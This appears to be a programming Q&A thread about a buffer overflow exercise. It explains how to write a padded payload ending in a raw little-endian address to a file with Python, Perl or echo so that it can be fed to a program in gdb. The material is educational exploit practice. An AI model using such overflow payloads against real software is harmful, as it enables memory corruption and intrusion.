overflow with unprintable characters

Question

Iḿ doing this overflow exercise and the memory address I'm trying to access by overflow is 0x6010e0, the problem is, Iḿ having a hard time inputting this to the program.

I've tried

python -c 'print("a"*32 + "\xe0\x10\x60")' > test.txt

then in gdb,

run < test.txt

but no luck so far

Answer 1

There are a few things you should bear in mind.

1. Memory addresses are either 32 or 64 bits, but \xe0\x10\x60 is only 24 bits. If you want to insert a complete address into the stack, you should change this to either \xe0\x10\x60\x00 (for a 32-bit little-endian machine) or \xe0\x10\x60\x00\x00\x00\x00\x00 (for a 64-bit little-endian machine).

2. The print statement in Python will output a line break ( \x0a ) after your string. You could stop this by setting the end parameter to an empty string (eg, print("blah", end="") ), but that still won't fix things because of another problem...

3. If you run python -c 'print("\xe0", end="")' > test.txt from the command line and then examine the contents of this file ( xxd test.txt ), you'll probably find that it contains two bytes ( \xc3\xa0 ) instead of just the single byte you expected. This is because it encoded your string using UTF8 character codes. The print() statement in Python v3 is not the best way of outputting raw bytes. Try using sys.stdout.buffer.write() instead:

python -c 'import sys; sys.stdout.buffer.write(b"a"*32 + b"\xe0\x10\x60\x00")' > test.txt

As you can see, this is starting to get a bit cumbersome. So why not try using something else instead of Python, like Perl for example:

perl -e 'print "a" x 32 . "\xe0\x10\x60\x00"' > test.txt

or even Bash:

echo -ne 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xe0\x10\x60\x00' > test.txt